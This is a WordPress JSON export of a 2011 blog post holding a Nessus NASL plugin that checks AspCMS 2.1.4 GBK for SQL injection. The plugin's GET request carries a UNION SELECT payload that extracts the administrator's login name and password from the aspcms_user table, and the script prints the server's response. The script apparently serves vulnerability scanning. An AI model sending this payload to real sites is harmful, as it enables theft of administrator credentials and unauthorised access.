﻿{"id":416,"date":"2011-08-26T13:06:21","date_gmt":"2011-08-26T13:06:21","guid":{"rendered":""},"modified":"2011-11-21T19:42:39","modified_gmt":"2011-11-21T11:42:39","slug":"416","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/416.html","title":{"rendered":"nessus\u6ce8\u5c04\u6a21\u5757"},"content":{"rendered":"<p>#<br \/>\n# NASL, Inc.<br \/>\n#<\/p>\n<p>include(&#8220;compat.inc&#8221;);<br \/>\nif(description)<br \/>\n{<br \/>\nscript_id(90029);<br \/>\nscript_version(&#8220;$Revision: 1.0 $&#8221;);<br \/>\nname[&#8220;english&#8221;] = &#8220;check aspcms2.1.4GBK SQL Injection security hole&#8221;;<br \/>\nscript_name(english:name[&#8220;english&#8221;]);<\/p>\n<p>desc[&#8220;english&#8221;] = &#8220;check aspcms2.1.4GBK SQL Injection security hole&#8221;;<br \/>\nscript_description(english:desc[&#8220;english&#8221;]);<\/p>\n<p>script_summary(english:&#8221;john&#8221;);<\/p>\n<p>script_category(ACT_GATHER_INFO);<\/p>\n<p>script_copyright(english:&#8221;This script is Copyright (C) 2011 by john&#8221;);<br \/>\nfamily[&#8220;english&#8221;] = &#8220;goingdown john&#8221;;<br \/>\nscript_family(english:family[&#8220;english&#8221;]);<br \/>\nscript_dependencie(&#8220;find_service1.nasl&#8221;,&#8221;http_version.nasl&#8221;);<br \/>\nscript_require_ports(&#8220;Services\/www&#8221;, 80);<br \/>\nexit(0);<br \/>\n}<br \/>\ninclude(&#8220;global_settings.inc&#8221;);<br \/>\ninclude(&#8220;misc_func.inc&#8221;);<br \/>\ninclude(&#8220;http.inc&#8221;);<br \/>\nstr1=&#8221;\/admin\/_content\/_About\/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1&#8243;;<br \/>\nr1=http_send_recv3(method: &#8220;GET&#8221;, item:str1, port: 80);<br \/>\ndisplay(r1);<br \/>\ndisplay(r1[2]);<br \/>\nif( r1 == NULL )<br \/>\n{<br \/>\nreturn(0);<br \/>\n}<br \/>\nif(&#8220;HTTP\/1.1 400 Bad Request&#8221;&gt;!&lt;string(r1))<br \/>\n{<br \/>\nreturn(0);<br \/>\n}<br \/>\nif(&#8220;HTTP Error 400. The request is badly formed.&#8221;&gt;!&lt;string(r1[2]))<br \/>\n{<br \/>\nreturn(0);<br \/>\n}<br \/>\nelse<br \/>\n{<br \/>\nsecurity_hole(port);<br \/>\n}<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p># # NASL, Inc. # include(&#8220;compat.i &hellip;<\/p>\n<p class=\"read-more\"><a href=\"http:\/\/zerobox.org\/notes\/416.html\">\u7ee7\u7eed\u9605\u8bfb &raquo;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[52,53],"class_list":["post-416","post","type-post","status-publish","format-standard","hentry","tag-nessus","tag-53"],"views":1191,"_links":{"self":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/comments?post=416"}],"version-history":[{"count":0,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/posts\/416\/revisions"}],"wp:attachment":[{"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/media?parent=416"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/categories?post=416"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zerobox.org\/notes\/wp-json\/wp\/v2\/tags?post=416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}